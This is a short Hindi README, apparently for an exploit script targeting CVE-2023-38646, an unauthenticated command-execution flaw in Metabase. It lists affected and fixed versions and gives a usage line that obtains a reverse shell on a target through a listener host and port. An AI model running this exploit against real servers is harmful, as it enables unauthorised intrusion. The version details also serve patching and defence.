
यह स्क्रिप्ट कमजोर Metabase सॉफ्टवेयर संस्करणों का शोषण करने के लिए डिज़ाइन की गई है, जो आपको हमलावर के रूप में एक शेल प्रदान करती है।
0.46.6.1 से पहले का Metabase ओपन सोर्स और 1.46.6.1 से पहले का Metabase Enterprise हमलावरों को सर्वर पर, सर्वर के विशेषाधिकार स्तर पर, मनमाने कमांड निष्पादित करने की अनुमति देता है। शोषण के लिए प्रमाणीकरण आवश्यक नहीं है। अन्य फिक्स किए गए संस्करण 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 और 1.43.7.2 हैं।
यदि Metabase संस्करण असुरक्षित है, तो यह स्क्रिप्ट आपको हमलावर के रूप में लक्ष्य सिस्टम पर शेल कनेक्शन प्राप्त करने की अनुमति देगी।
python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

लेखक: @birdm4nw